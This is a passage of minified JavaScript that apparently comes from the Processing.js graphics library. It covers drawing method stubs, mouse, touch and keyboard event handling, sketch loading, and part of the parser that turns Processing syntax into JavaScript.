dU[d7].apply(this,arguments)}}b9.prototype.translate=cT("translate");b9.prototype.scale=cT("scale");b9.prototype.pushMatrix=cT("pushMatrix");b9.prototype.popMatrix=cT("popMatrix");b9.prototype.resetMatrix=cT("resetMatrix");b9.prototype.applyMatrix=cT("applyMatrix");b9.prototype.rotate=cT("rotate");b9.prototype.rotateZ=cT("rotateZ");b9.prototype.redraw=cT("redraw");b9.prototype.toImageData=cT("toImageData");b9.prototype.ambientLight=cT("ambientLight");b9.prototype.directionalLight=cT("directionalLight");b9.prototype.lightFalloff=cT("lightFalloff");b9.prototype.lightSpecular=cT("lightSpecular");b9.prototype.pointLight=cT("pointLight");b9.prototype.noLights=cT("noLights");b9.prototype.spotLight=cT("spotLight");b9.prototype.beginCamera=cT("beginCamera");b9.prototype.endCamera=cT("endCamera");b9.prototype.frustum=cT("frustum");b9.prototype.box=cT("box");b9.prototype.sphere=cT("sphere");b9.prototype.ambient=cT("ambient");b9.prototype.emissive=cT("emissive");b9.prototype.shininess=cT("shininess");b9.prototype.specular=cT("specular");b9.prototype.fill=cT("fill");b9.prototype.stroke=cT("stroke");b9.prototype.strokeWeight=cT("strokeWeight");b9.prototype.smooth=cT("smooth");b9.prototype.noSmooth=cT("noSmooth");b9.prototype.point=cT("point");b9.prototype.vertex=cT("vertex");b9.prototype.endShape=cT("endShape");b9.prototype.bezierVertex=cT("bezierVertex");b9.prototype.curveVertex=cT("curveVertex");b9.prototype.curve=cT("curve");b9.prototype.line=cT("line");b9.prototype.bezier=cT("bezier");b9.prototype.rect=cT("rect");b9.prototype.ellipse=cT("ellipse");b9.prototype.background=cT("background");b9.prototype.image=cT("image");b9.prototype.textWidth=cT("textWidth");b9.prototype.text$line=cT("text$line");b9.prototype.$ensureContext=cT("$ensureContext");b9.prototype.$newPMatrix=cT("$newPMatrix");b9.prototype.size=function(d7,d9,d8){cK(d8===2?"3D":"2D");cV.size(d7,d9,d8)};b9.prototype.$init=E;bO.prototype.$init=function(){cV.size(cV.width,cV.height);d4.lineCap="round";cV.noSmooth();cV.disableContextMenu()};by.prototype.$init=function(){cV.use3DContext=true};dp.prototype.$ensureContext=function(){return d4};function dv(d8,ea){var d9=d8,d7=0,eb=0;cV.pmouseX=cV.mouseX;cV.pmouseY=cV.mouseY;if(d9.offsetParent){do{d7+=d9.offsetLeft;eb+=d9.offsetTop}while(!!(d9=d9.offsetParent))}d9=d8;do{d7-=d9.scrollLeft||0;eb-=d9.scrollTop||0}while(!!(d9=d9.parentNode));d7+=ab;eb+=dl;d7+=aR;eb+=bV;d7+=B.pageXOffset;eb+=B.pageYOffset;return{X:d7,Y:eb}}function aG(d7,d8){var d9=dv(d7,d8);cV.mouseX=d8.pageX-d9.X;cV.mouseY=d8.pageY-d9.Y}function ct(d8){var ea=dv(d8.changedTouches[0].target,d8.changedTouches[0]),d7;for(d7=0;d7<d8.touches.length;d7++){var ec=d8.touches[d7];ec.offsetX=ec.pageX-ea.X;ec.offsetY=ec.pageY-ea.Y}for(d7=0;d7<d8.targetTouches.length;d7++){var d9=d8.targetTouches[d7];d9.offsetX=d9.pageX-ea.X;d9.offsetY=d9.pageY-ea.Y}for(d7=0;d7<d8.changedTouches.length;d7++){var eb=d8.changedTouches[d7];eb.offsetX=eb.pageX-ea.X;eb.offsetY=eb.pageY-ea.Y}return d8}bM(ac,"touchstart",function(d9){ac.setAttribute("style","-webkit-user-select: none");ac.setAttribute("onclick","void(0)");ac.setAttribute("style","-webkit-tap-highlight-color:rgba(0,0,0,0)");for(var d8=0,d7=at.length;d8<d7;d8++){var ea=at[d8].type;if(ea==="mouseout"||ea==="mousemove"||ea==="mousedown"||ea==="mouseup"||ea==="DOMMouseScroll"||ea==="mousewheel"||ea==="touchstart"){dd(at[d8])}}if(cV.touchStart!==r||cV.touchMove!==r||cV.touchEnd!==r||cV.touchCancel!==r){bM(ac,"touchstart",function(eb){if(cV.touchStart!==r){eb=ct(eb);cV.touchStart(eb)}});bM(ac,"touchmove",function(eb){if(cV.touchMove!==r){eb.preventDefault();eb=ct(eb);cV.touchMove(eb)}});bM(ac,"touchend",function(eb){if(cV.touchEnd!==r){eb=ct(eb);cV.touchEnd(eb)}});bM(ac,"touchcancel",function(eb){if(cV.touchCancel!==r){eb=ct(eb);cV.touchCancel(eb)}})}else{bM(ac,"touchstart",function(eb){aG(ac,eb.touches[0]);cV.__mousePressed=true;cV.mouseDragging=false;cV.mouseButton=37;if(typeof cV.mousePressed==="function"){cV.mousePressed()}});bM(ac,"touchmove",function(eb){eb.preventDefault();aG(ac,eb.touches[0]);if(typeof cV.mouseMoved==="function"&&!cV.__mousePressed){cV.mouseMoved()}if(typeof cV.mouseDragged==="function"&&cV.__mousePressed){cV.mouseDragged();cV.mouseDragging=true}});bM(ac,"touchend",function(eb){cV.__mousePressed=false;if(typeof cV.mouseClicked==="function"&&!cV.mouseDragging){cV.mouseClicked()}if(typeof cV.mouseReleased==="function"){cV.mouseReleased()}})}ac.dispatchEvent(d9)});(function(){var d7=true,d8=function(d9){d9.preventDefault();d9.stopPropagation()};cV.disableContextMenu=function(){if(!d7){return}bM(ac,"contextmenu",d8);d7=false};cV.enableContextMenu=function(){if(d7){return}dd({elem:ac,type:"contextmenu",fn:d8});d7=true}})();bM(ac,"mousemove",function(d7){aG(ac,d7);if(typeof cV.mouseMoved==="function"&&!cV.__mousePressed){cV.mouseMoved()}if(typeof cV.mouseDragged==="function"&&cV.__mousePressed){cV.mouseDragged();cV.mouseDragging=true}});bM(ac,"mouseout",function(d7){if(typeof cV.mouseOut==="function"){cV.mouseOut()}});bM(ac,"mouseover",function(d7){aG(ac,d7);if(typeof cV.mouseOver==="function"){cV.mouseOver()}});bM(ac,"mousedown",function(d7){cV.__mousePressed=true;cV.mouseDragging=false;switch(d7.which){case 1:cV.mouseButton=37;break;case 2:cV.mouseButton=3;break;case 3:cV.mouseButton=39;break}if(typeof cV.mousePressed==="function"){cV.mousePressed()}});bM(ac,"mouseup",function(d7){cV.__mousePressed=false;if(typeof cV.mouseClicked==="function"&&!cV.mouseDragging){cV.mouseClicked()}if(typeof cV.mouseReleased==="function"){cV.mouseReleased()}});var am=function(d7){var d8=0;if(d7.wheelDelta){d8=d7.wheelDelta/120;if(B.opera){d8=-d8}}else{if(d7.detail){d8=-d7.detail/3}}cV.mouseScroll=d8;if(d8&&typeof cV.mouseScrolled==="function"){cV.mouseScrolled()}};bM(d,"DOMMouseScroll",am);bM(d,"mousewheel",am);if(typeof ac==="string"){ac=d.getElementById(ac)}if(!ac.getAttribute("tabindex")){ac.setAttribute("tabindex",0)}function dA(d8){var d7=d8.which||d8.keyCode;switch(d7){case 13:return 10;case 91:case 93:case 224:return 157;case 57392:return 17;case 46:return 127;case 45:return 155}return d7}function cA(d8){var d9=d8.which||d8.keyCode;var d7=d8.shiftKey||d8.ctrlKey||d8.altKey||d8.metaKey;switch(d9){case 13:d9=d7?13:10;break;case 8:d9=d7?127:8;break}return new bN(d9)}function cQ(d7){if(typeof d7.preventDefault==="function"){d7.preventDefault()}else{if(typeof d7.stopPropagation==="function"){d7.stopPropagation()}}return false}function dC(){var d7;for(d7 in af){if(af.hasOwnProperty(d7)){cV.__keyPressed=true;return}}cV.__keyPressed=false}function cw(){cV.__keyPressed=false;af=[];dE=null}function bn(d7,d8){af[d7]=d8;dE=null;cV.key=d8;cV.keyCode=d7;cV.keyPressed();cV.keyCode=0;cV.keyTyped();dC()}function cy(d8){var d7=dA(d8);if(d7===127){bn(d7,new bN(127));return}if(dT.indexOf(d7)<0){dE=d7;return}var d9=new bN(65535);cV.key=d9;cV.keyCode=d7;af[d7]=d9;cV.keyPressed();dE=null;dC();return cQ(d8)}function ds(d8){if(dE===null){return}var d7=dE,d9=cA(d8);bn(d7,d9);return cQ(d8)}function co(d8){var d7=dA(d8),d9=af[d7];if(d9===r){return}cV.key=d9;cV.keyCode=d7;cV.keyReleased();delete af[d7];dC()}if(!cU){if(a6 instanceof D.Sketch){cP=a6}else{if(typeof a6==="function"){cP=new D.Sketch(a6)}else{if(!a6){cP=new D.Sketch(function(){})}else{cP=D.compile(a6)}}}cV.externals.sketch=cP;cK();ac.onfocus=function(){cV.focused=true};ac.onblur=function(){cV.focused=false;if(!cP.options.globalKeyEvents){cw()}};if(cP.options.pauseOnBlur){bM(B,"focus",function(){if(aB){cV.loop()}});bM(B,"blur",function(){if(aB&&aw){cV.noLoop();aB=true}cw()})}var aS=cP.options.globalKeyEvents?B:ac;bM(aS,"keydown",cy);bM(aS,"keypress",ds);bM(aS,"keyup",co);for(var c3 in D.lib){if(D.lib.hasOwnProperty(c3)){if(D.lib[c3].hasOwnProperty("attach")){D.lib[c3].attach(cV)}else{if(D.lib[c3] instanceof Function){D.lib[c3].call(this)}}}}var dy=100;var b5=function(ea){if(!(cP.imageCache.pending||F.preloading.pending(dy))){if(B.opera){var d9,d8,d7=cP.imageCache.operaCache;for(d9 in d7){if(d7.hasOwnProperty(d9)){d8=d7[d9];if(d8!==null){d.body.removeChild(d8)}delete d7[d9]}}}cP.attach(ea,g);cP.onLoad(ea);if(ea.setup){ea.setup();ea.resetMatrix();cP.onSetup()}R();if(ea.draw){if(!aB){ea.redraw()}else{ea.loop()}}}else{B.setTimeout(function(){b5(ea)},dy)}};a(this);b5(cV)}else{cP=new D.Sketch;cK();cV.size=function(d7,d9,d8){if(d8&&d8===2){cK("3D")}else{cK("2D")}cV.size(d7,d9,d8)}}};D.debug=q;D.prototype=g;function s(){var P=["abs","acos","alpha","ambient","ambientLight","append","applyMatrix","arc","arrayCopy","asin","atan","atan2","background","beginCamera","beginDraw","beginShape","bezier","bezierDetail","bezierPoint","bezierTangent","bezierVertex","binary","blend","blendColor","blit_resize","blue","box","breakShape","brightness","camera","ceil","Character","color","colorMode","concat","constrain","copy","cos","createFont","createGraphics","createImage","cursor","curve","curveDetail","curvePoint","curveTangent","curveTightness","curveVertex","day","degrees","directionalLight","disableContextMenu","dist","draw","ellipse","ellipseMode","emissive","enableContextMenu","endCamera","endDraw","endShape","exit","exp","expand","externals","fill","filter","floor","focused","frameCount","frameRate","frustum","get","glyphLook","glyphTable","green","height","hex","hint","hour","hue","image","imageMode","intersect","join","key","keyCode","keyPressed","keyReleased","keyTyped","lerp","lerpColor","lightFalloff","lights","lightSpecular","line","link","loadBytes","loadFont","loadGlyphs","loadImage","loadPixels","loadShape","loadStrings","log","loop","mag","map","match","matchAll","max","millis","min","minute","mix","modelX","modelY","modelZ","modes","month","mouseButton","mouseClicked","mouseDragged","mouseMoved","mouseOut","mouseOver","mousePressed","mouseReleased","mouseScroll","mouseScrolled","mouseX","mouseY","name","nf","nfc","nfp","nfs","noCursor","noFill","noise","noiseDetail","noiseSeed","noLights","noLoop","norm","normal","noSmooth","noStroke","noTint","ortho","param","parseBoolean","parseByte","parseChar","parseFloat","parseInt","peg","perspective","PImage","pixels","PMatrix2D","PMatrix3D","PMatrixStack","pmouseX","pmouseY","point","pointLight","popMatrix","popStyle","pow","print","printCamera","println","printMatrix","printProjection","PShape","PShapeSVG","pushMatrix","pushStyle","quad","radians","random","Random","randomSeed","rect","rectMode","red","redraw","requestImage","resetMatrix","reverse","rotate","rotateX","rotateY","rotateZ","round","saturation","save","saveFrame","saveStrings","scale","screenX","screenY","screenZ","second","set","setup","shape","shapeMode","shared","shininess","shorten","sin","size","smooth","sort","specular","sphere","sphereDetail","splice","split","splitTokens","spotLight","sq","sqrt","status","str","stroke","strokeCap","strokeJoin","strokeWeight","subset","tan","text","textAlign","textAscent","textDescent","textFont","textLeading","textMode","textSize","texture","textureMode","textWidth","tint","toImageData","touchCancel","touchEnd","touchMove","touchStart","translate","triangle","trim","unbinary","unhex","updatePixels","use3DContext","vertex","width","XMLElement","year","__contains","__equals","__equalsIgnoreCase","__frameRate","__hashCode","__int_cast","__instanceof","__keyPressed","__mousePressed","__printStackTrace","__replace","__replaceAll","__replaceFirst","__toCharArray","__split","__codePointAt","__startsWith","__endsWith"];var N={};var O,M;for(O=0,M=P.length;O<M;++O){N[P[O]]=null}for(var Q in D.lib){if(D.lib.hasOwnProperty(Q)){if(D.lib[Q].exports){var L=D.lib[Q].exports;for(O=0,M=L.length;O<M;++O){N[L[O]]=null}}}}return N}function c(ap){var aV=s();function aC(bo){var br=[];var bt=bo.split(/([\{\[\(\)\]\}])/);var bw=bt[0];var bu=[];for(var bq=1;bq<bt.length;bq+=2){var bv=bt[bq];if(bv==="["||bv==="{"||bv==="("){bu.push(bw);bw=bv}else{if(bv==="]"||bv==="}"||bv===")"){var bp=bv==="}"?"A":bv===")"?"B":"C";var bs=br.length;br.push(bw+bv);bw=bu.pop()+'"'+bp+(bs+1)+'"'}}bw+=bt[bq+1]}br.unshift(bw);return br}function ah(bp,bo){return bp.replace(/'(\d+)'/g,function(br,bq){var bs=bo[bq];if(bs.charAt(0)==="/"){return bs}return/^'((?:[^'\\\n])|(?:\\.[0-9A-Fa-f]*))'$/.test(bs)?"(new $p.Character("+bs+"))":bs})}function aN(br){var bq=/^\s*/.exec(br),bo;if(bq[0].length===br.length){bo={left:bq[0],middle:"",right:""}}else{var bp=/\s*$/.exec(br);bo={left:bq[0],middle:br.substring(bq[0].length,bp.index),right:bp[0]}}bo.untrim=function(bs){return this.left+bs+this.right};return bo}function a4(bo){return bo.replace(/^\s+/,"").replace(/\s+$/,"")}function at(bq,br){for(var bp=0,bo=br.length;bp<bo;++bp){bq[br[bp]]=null}return bq}function a8(bp){for(var bo in bp){if(bp.hasOwnProperty(bo)){return false}}return true}function aO(bo){return bo.substring(2,bo.length-1)}var be=ap.replace(/\r\n?|\n\r/g,"\n");var L=[];var a1=be.replace(/("(?:[^"\\\n]|\\.)*")|('(?:[^'\\\n]|\\.)*')|(([\[\(=|&!\^:?]\s*)(\/(?![*\/])(?:[^\/\\\n]|\\.)*\/[gim]*)\b)|(\/\/[^\n]*\n)|(\/\*(?:(?!\*\/)(?:.|\n))*\*\/)/g,function(bw,bp,bt,bu,br,bv,bo,bq){var bs;if(bp||bt){bs=L.length;L.push(bw);return"'"+bs+"'"}if(bu){bs=L.length;L.push(bv);return br+"'"+bs+"'"}return bq!==""?" ":"\n"});var X;var ay=a1;var Y=function(bp,bq,bo,br){if(!!bq||!!br){return bp}X=true;return""};do{X=false;ay=ay.replace(/([<]?)<\s*((?:\?|[A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*)(?:\s+(?:extends|super)\s+[A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*)?(?:\s*,\s*(?:\?|[A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*)(?:\s+(?:extends|super)\s+[A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*)?)*)\s*>([=]?)/g,Y)}while(X);var bi=aC(ay);var aj;var aH={},a7,ax=0;function ba(bp,bo){var bq=bi.length;bi.push(bp);return'"'+bo+bq+'"'}function a5(){return"class"+ ++ax}function bj(bp,bq,bo){bp.classId=bq;bp.scopeId=bo;aH[bq]=bp}var T,Q,an,aT,bg,aX;var M=/\b((?:(?:public|private|final|protected|static|abstract)\s+)*)(class|interface)\s+([A-Za-z_$][\w$]*\b)(\s+extends\s+[A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*(?:\s*,\s*[A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*\b)*)?(\s+implements\s+[A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*(?:\s*,\s*[A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*\b)*)?\s*("A\d+")/g;var a9=/\b((?:(?:public|private|final|protected|static|abstract|synchronized)\s+)*)((?!(?:else|new|return|throw|function|public|private|protected)\b)[A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*(?:\s*"C\d+")*)\s*([A-Za-z_$][\w$]*\b)\s*("B\d+")(\s*throws\s+[A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*(?:\s*,\s*[A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*)*)?\s*("A\d+"|;)/g;var aK=/^((?:(?:public|private|final|protected|static)\s+)*)((?!(?:else|new|return|throw)\b)[A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*(?:\s*"C\d+")*)\s*([A-Za-z_$][\w$]*\b)\s*(?:"C\d+"\s*)*([=,]|$)/;var bk=/\b((?:(?:public|private|final|protected|static|abstract)\s+)*)((?!(?:new|return|throw)\b)[A-Za-z_$][\w$]*\b)\s*("B\d+")(\s*throws\s+[A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*(?:\s*,\s*[A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*)*)?\s*("A\d+")/g;var U=/^((?:(?:public|private|final|protected|static)\s+)*)((?!(?:new|return|throw)\b)[A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*(?:\s*"C\d+")*)\s*/;var ar=/\bfunction(?:\s+([A-Za-z_$][\w$]*))?\s*("B\d+")\s*("A\d+")/g;function ac(bp){var bo=bp;bo=bo.replace(M,function(bq){return ba(bq,"E")});bo=bo.replace(a9,function(bq){return ba(bq,"D")});bo=bo.replace(ar,function(bq){return ba(bq,"H")});return bo}function bb(bq,bp){var bo=bq.replace(bk,function(bv,bs,bt,bw,bu,br){if(bt!==bp){return bv}return ba(bv,"G")});return bo}function aF(bo){this.name=bo}aF.prototype.toString=function(){return this.name};function am(bo){this.params=bo}am.prototype.getNames=function(){var bq=[];for(var bp=0,bo=this.params.length;bp<bo;++bp){bq.push(this.params[bp].name)}return bq};am.prototype.toString=function(){if(this.params.length===0){return"()"}var bo="(";for(var bq=0,bp=this.params.length;bq<bp;++bq){bo+=this.params[bq]+", "}return bo.substring(0,bo.length-2)+")"};function aB(bt){var br=a4(bt.substring(1,bt.length-1));var bo=[];if(br!==""){var bp=br.split(",");for(var bq=0;bq<bp.length;++bq){var bs=/\b([A-Za-z_$][\w$]*\b)(\s*"[ABC][\d]*")*\s*$/.exec(bp[bq]);bo.push(new aF(bs[1]))}}return new am(bo)}function ao(bs){var br=bs;br=br.replace(/\bnew\s+([A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*)(?:\s*"C\d+")+\s*("A\d+")/g,function(bu,bt,bv){return bv});br=br.replace(/\bnew\s+([A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*)(?:\s*"B\d+")\s*("A\d+")/g,function(bu,bt,bv){return ba(bu,"F")});br=br.replace(ar,function(bt){return ba(bt,"H")});br=br.replace(/\bnew\s+([A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*)\s*("C\d+"(?:\s*"C\d+")*)/g,function(by,bx,bv){var bu=bv.replace(/"C(\d+)"/g,function(bA,bz){return bi[bz]}).replace(/\[\s*\]/g,"[null]").replace(/\s*\]\s*\[\s*/g,", ");var bw="{"+bu.substring(1,bu.length-1)+"}";var bt="('"+bx+"', "+ba(bw,"A")+")";return"$p.createJavaArray"+ba(bt,"B")});br=br.replace(/(\.\s*length)\s*"B\d+"/g,"$1");br=br.replace(/#([0-9A-Fa-f]{6})\b/g,function(bt,bu){return"0xFF"+bu});br=br.replace(/"B(\d+)"(\s*(?:[\w$']|"B))/g,function(bw,bu,bv){var bx=bi[bu];if(!/^\(\s*[A-Za-z_$][\w$]*\b(?:\s*\.\s*[A-Za-z_$][\w$]*\b)*\s*(?:"C\d+"\s*)*\)$/.test(bx)){return bw}if(/^\(\s*int\s*\)$/.test(bx)){return"(int)"+bv}var bt=bx.split(/"C(\d+)"/g);if(bt.length>1){if(!/^\[\s*\]$/.test(bi[bt[1]])){return bw}}return""+bv});br=br.replace(/\(int\)([^,\]\)\}\?\:\*\+\-\/\^\|\%\&\~<\>\=]+)/g,function(bu,bt){var bv=aN(bt);return bv.untrim("__int_cast("+bv.middle+")")});br=br.replace(/\bsuper(\s*"B\d+")/g,"$$superCstr$1").replace(/\bsuper(\s*\.)/g,"$$super$1");br=br.replace(/\b0+((\d*)(?:\.[\d*])?(?:[eE][\-\+]?\d+)?[fF]?)\b/,function(bv,bu,bt){if(bu===bt){return bv}return bt===""?"0"+bu:bu});br=br.replace(/\b(\.?\d+\.?)[fF]\b/g,"$1");br=br.replace(/([^\s])%([^=\s])/g,"$1 % $2");br=br.replace(/\b(frameRate|keyPressed|mousePressed)\b(?!\s*"B)/g,"__$1");br=br.replace(/\b(boolean|byte|char|float|int)\s*"B/g,function(bu,bt){return"parse"+bt.substring(0,1).toUpperCase()+bt.substring(1)+'"B'});br=br.replace(/\bpixels\b\s*(("C(\d+)")|\.length)?(\s*=(?!=)([^,\]\)\}]+))?/g,function(bu,by,bt,bx,bw,bz){if(bt){var bv=bi[bx];if(bw){return"pixels.setPixel"+ba("("+bv.substring(1,bv.length-1)+","+bz+")","B")}return"pixels.getPixel"+ba("("+bv.substring(1,bv.length-1)+")","B")}if(by){return"pixels.getLength"+ba("()","B")}if(bw){return"pixels.set"+ba("("+bz+")","B")}return"pixels.toArray"+ba("()","B")});var bq;function bp(bu,bt,by,bw){var bv=bi[bw];bq=true;var bx=aN(bv.substring(1,bv.length-1));return"__"+by+(bx.middle===""?ba("("+bt.replace(/\.\s*$/,"")+")","B"):ba("("+bt.replace(/\.\s*$/,"")+","+bx.middle+")","B"))}do{bq=false;br=br.replace(/((?:'\d+'|\b[A-Za-z_$][\w$]*\s*(?:"[BC]\d+")*)\s*\.\s*(?:[A-Za-z_$][\w$]*\s*(?:"[BC]\d+"\s*)*\.\s*)*)(replace|replaceAll|replaceFirst|contains|equals|equalsIgnoreCase|hashCode|toCharArray|printStackTrace|split|startsWith|endsWith|codePointAt)\s*"B(\d+)"/g,bp)}while(bq);function bo(bv,bt,bu){bq=true;return"__instanceof"+ba("("+bt+", "+bu+")","B")}do{bq=false;br=br.replace(/((?:'\d+'|\b[A-Za-z_$][\w$]*\s*(?:"[BC]\d+")*)\s*(?:\.\s*[A-Za-z_$][\w$]*\s*(?:"[BC]\d+"\s*)*)*)instanceof\s+([A-Za-z_$][\w$]*\s*(?:\.\s*[A-Za-z_$][\w$]*)*)/g,bo)}while(bq);br=br.replace(/\bthis(\s*"B\d+")/g,"$$constr$1");return br}function aA(bp,bo){this.baseInterfaceName=bp;this.body=bo;bo.owner=this}aA.prototype.toString=function(){return"new ("+this.body+")"};function ag(bq){var bp=(new RegExp(/\bnew\s*([A-Za-z_$][\w$]*\s*(?:\.\s*[A-Za-z_$][\w$]*)*)\s*"B\d+"\s*"A(\d+)"/)).exec(bq);var bt=a7,bs=a5();a7=bs;var bo=bp[1]+"$"+bs;var br=new aA(bo,T(bi[bp[2]],bo,"","implements "+bp[1]));bj(br,bs,bt);a7=bt;return br}function ad(bp,bq,bo){this.name=bp;this.params=bq;this.body=bo}ad.prototype.toString=function(){var bp=aj;var bq=at({"this":null},this.params.getNames());aj=function(br){return bq.hasOwnProperty(br.name)?br.name:bp(br)};var bo="function";if(this.name){bo+=" "+this.name}bo+=this.params+" "+this.body;aj=bp;return bo};function aI(bp){var bo=(new RegExp(/\b([A-Za-z_$][\w$]*)\s*"B(\d+)"\s*"A(\d+)"/)).exec(bp);return new ad(bo[1]!=="function"?bo[1]:null,aB(bi[bo[2]]),an(bi[bo[3]]))}function ab(bo){this.members=bo}ab.prototype.toString=function(){var bq=aj;aj=function(bs){return bs.name==="this"?"this":bq(bs)};var bo="";for(var br=0,bp=this.members.length;br<bp;++br){if(this.members[br].label){bo+=this.members[br].label+": "}bo+=this.members[br].value.toString()+", "}aj=bq;return bo.substring(0,bo.length-2)};function aD(br){var bo=br.split(",");for(var bq=0;bq<bo.length;++bq){var bp=bo[bq].indexOf(":");if(bp<0){bo[bq]={value:aX(bo[bq])}}else{bo[bq]={label:a4(bo[bq].substring(0,bp)),value:aX(a4(bo[bq].substring(bp+1)))}}}return new ab(bo)}function aw(bq){if(bq.charAt(0)==="("||bq.charAt(0)==="["){return bq.charAt(0)+aw(bq.substring(1,bq.length-1))+bq.charAt(bq.length-1)}if(bq.charAt(0)==="{"){if(/^\{\s*(?:[A-Za-z_$][\w$]*|'\d+')\s*:/.test(bq)){return"{"+ba(bq.substring(1,bq.length-1),"I")+"}"}return"["+aw(bq.substring(1,bq.length-1))+"]"}var bp=aN(bq);var bo=ao(bp.middle);bo=bo.replace(/"[ABC](\d+)"/g,function(bs,br){return aw(bi[br])});return bp.untrim(bo)}function P(bo){return bo.replace(/(\.\s*)?((?:\b[A-Za-z_]|\$)[\w$]*)(\s*\.\s*([A-Za-z_$][\w$]*)(\s*\()?)?/g,function(br,bt,bp,bv,bu,bs){if(bt){return br}var bq={name:bp,member:bu,callSign:!!bs};return aj(bq)+(bv===r?"":bv)})}function bn(bp,bo){this.expr=bp;this.transforms=bo}bn.prototype.toString=function(){var bo=this.transforms;var bp=P(this.expr);return bp.replace(/"!(\d+)"/g,function(br,bq){return bo[bq].toString()})};aX=function(bq){var bp=[];var bo=aw(bq);bo=bo.replace(/"H(\d+)"/g,function(bs,br){bp.push(aI(bi[br]));return'"!'+(bp.length-1)+'"'});bo=bo.replace(/"F(\d+)"/g,function(bs,br){bp.push(ag(bi[br]));return'"!'+(bp.length-1)+'"'});bo=bo.replace(/"I(\d+)"/g,function(bs,br){bp.push(aD(bi[br]));return'"!'+(bp.length-1)+'"'});return new bn(bo,bp)};function a2(bo,bq,bp){this.name=bo;this.value=bq;this.isDefault=bp}a2.prototype.toString=function(){return this.name+" = "+this.value};function ai(bs,bp){var bt=bs.indexOf("=");var bo,br,bq;if(bt<0){bo=bs;br=bp;bq=true}else{bo=bs.substring(0,bt);br=aX(bs.substring(bt+1));bq=false}return new a2(a4(bo.replace(/(\s*"C\d+")+/g,"")),br,bq)}function aR(bo){if(bo==="int"||bo==="float"){return"0"}if(bo==="boolean"){return"false"}if(bo==="color"){return"0x00000000"}return"null"}function aG(bp,bo){this.definitions=bp;this.varType=bo}aG.prototype.getNames=function(){var bq=[];for(var bp=0,bo=this.definitions.length;bp<bo;++bp){bq.push(this.definitions[bp].name)}return bq};aG.prototype.toString=function(){return"var "+this.definitions.join(",")};function af(bo){this.expression=bo}af.prototype.toString=function(){return this.expression.toString()};function bl(bs){if(aK.test(bs)){var br=U.exec(bs);var bq=bs.substring(br[0].length).split(",");var bo=aR(br[2]);for(var bp=0;bp<bq.length;++bp){bq[bp]=ai(bq[bp],bo)}return new aG(bq,br[2])}return new af(aX(bs))}function aZ(bo,bq,bp){this.initStatement=bo;this.condition=bq;this.step=bp}aZ.prototype.toString=function(){return"("+this.initStatement+"; "+this.condition+"; "+this.step+")"};function aQ(bp,bo){this.initStatement=bp;this.container=bo}aQ.prototype.toString=function(){var bo=this.initStatement.toString();if(bo.indexOf("=")>=0){bo=bo.substring(0,bo.indexOf("="))}return"("+bo+" in "+this.container+")"};function aW(bp,bo){this.initStatement=bp;this.container=bo}aW.iteratorId=0;aW.prototype.toString=function(){var bs=this.initStatement.toString();var bp="$it"+aW.iteratorId++;var br=bs.replace(/^\s*var\s*/,"").split("=")[0];var bq="var "+bp+" = new $p.ObjectIterator("+this.container+"), "+br+" = void(0)";var bo=bp+".hasNext() && (("+br+" = "+bp+".next()) || true)";return"("+bq+"; "+bo+";)"};function W(bp){var bo;if(/\bin\b/.test(bp)){bo=bp.substring(1,bp.length-1).split(/\bin\b/g);return new aQ(bl(a4(bo[0])),aX(bo[1]))}if(bp.indexOf(":")>=0&&bp.indexOf(";")<0){bo=bp.substring(1,bp.length-1).split(":");return new aW(bl(a4(bo[0])),aX(bo[1]))}bo=bp.substring(1,bp.length-1).split(";");return new aZ(bl(a4(bo[0])),aX(bo[1]),aX(bo[2]))}function a0(bo){bo.sort(function(bq,bp){return bp.weight-bq.weight})}function Z(bq,bo,bp){this.name=bq;this.body=bo;this.isStatic=bp;bo.owner=this}Z.prototype.toString=function(){return""+this.body};function al(bq,bo,bp){this.name=bq;this.body=bo;this.isStatic=bp;bo.owner=this}al.prototype.toString=function(){return""+this.body};function R(bq){var bp=M.exec(bq);M.lastIndex=0;var br=bp[1].indexOf("static")>=0;var bo=bi[aO(bp[6])],bt;var bu=a7,bs=a5();a7=bs;if(bp[2]==="interface"){bt=new Z(bp[3],Q(bo,bp[3],bp[4]),br)}else{bt=new al(bp[3],T(bo,bp[3],bp[4],bp[5]),br)}bj(bt,bs,bu);a7=bu;return bt}function aa(bq,br,bo,bp){this.name=bq;this.params=br;this.body=bo;this.isStatic=bp}aa.prototype.toString=function(){var bq=at({},this.params.getNames());var bp=aj;aj=function(br){return bq.hasOwnProperty(br.name)?br.name:bp(br)};var bo="function "+this.methodId+this.params+" "+this.body+"\n";aj=bp;return bo};function N(br){var bp=a9.exec(br);a9.lastIndex=0;var bq=bp[1].indexOf("static")>=0;var bo=bp[6]!==";"?bi[aO(bp[6])]:"{}";return new aa(bp[3],aB(bi[aO(bp[4])]),an(bo),bq)}function ak(bq,bp,bo){this.definitions=bq;this.fieldType=bp;this.isStatic=bo}ak.prototype.getNames=function(){var bq=[];for(var bp=0,bo=this.definitions.length;bp<bo;++bp){bq.push(this.definitions[bp].name)}return bq};ak.prototype.toString=function(){var bv=aj({name:"[this]"});if(this.isStatic){var bu=this.owner.name;var bs=[];for(var bt=0,br=this.definitions.length;bt<br;++bt){var bq=this.definitions[bt];var 